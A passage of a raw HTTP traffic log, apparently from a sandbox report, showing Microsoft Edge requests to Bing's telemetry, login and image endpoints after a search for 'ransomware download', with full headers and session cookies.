referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
ResponseHTTP/2.0 200
pragma: no-cache
content-length: 236
content-type: text/html; charset=utf-8
content-encoding: br
expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a368fb6b4efba922fbd8a0239ef2
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-lUCF0cprgOxGx/gm/rqbo/+ErFSkgNUQsgrgXu3+MgQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 79B941CA4AED493C8B74BCD04242B712 Ref B: LTSEDGE1906 Ref C: 2024-02-29T15:31:51Z
date: Thu, 29 Feb 2024 15:31:52 GMT
set-cookie: .AspNetCore.Cookies=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; secure; samesite=lax; httponly
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:31:52 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b3160e2
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708588%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708588%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
ResponseHTTP/2.0 200
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 65e0a3682aa94ba1adda56ee46095856
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-900fKCvPG8aG6Oe+n8U7G8saKXQsMh244zkO581RFvM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 6B29712FB8EB4901BE0FF5492B3DFC49 Ref B: LON04EDGE0717 Ref C: 2024-02-29T15:31:52Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:52 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:31:52 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220712.b31619c
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708803%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708803%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 10A1B552DCCA48F08EBBDED604EA4507 Ref B: LON04EDGE0811 Ref C: 2024-02-29T15:31:52Z
date: Thu, 29 Feb 2024 15:31:52 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220712.b316263
-
Remote address:92.123.128.152:443RequestGET /secure/Passport.aspx?popup=1&ssl=1 HTTP/2.0
host: www.bing.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
access-control-allow-origin: https://www.bing.com
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 65e0a3695b4649c0bc445f8327222211
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-KmsDFPOXYF6T5ypHyaYF+n8YqUeGYyrF+J63snDdnvc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:53 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220713.b3169fb
-
POSThttps://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5960.1&url=javascript%3A%20void(0)msedge.exeRemote address:92.123.128.152:443RequestPOST /fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5960.1&url=javascript%3A%20void(0) HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
ResponseHTTP/2.0 200
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 41572
date: Thu, 29 Feb 2024 15:31:53 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220713.b316b30
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 299
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
ResponseHTTP/2.0 200
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 54612
date: Thu, 29 Feb 2024 15:31:53 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220713.b316b31
-
Remote address:92.123.128.152:443RequestGET /ipv6test/test?FORM=MONITR HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 14468D7CFAEA42388D82D0D74CA71025 Ref B: LON04EDGE0710 Ref C: 2024-02-29T15:31:53Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:53 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220713.b316cf9
-
Remote address:92.123.128.152:443RequestGET /th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
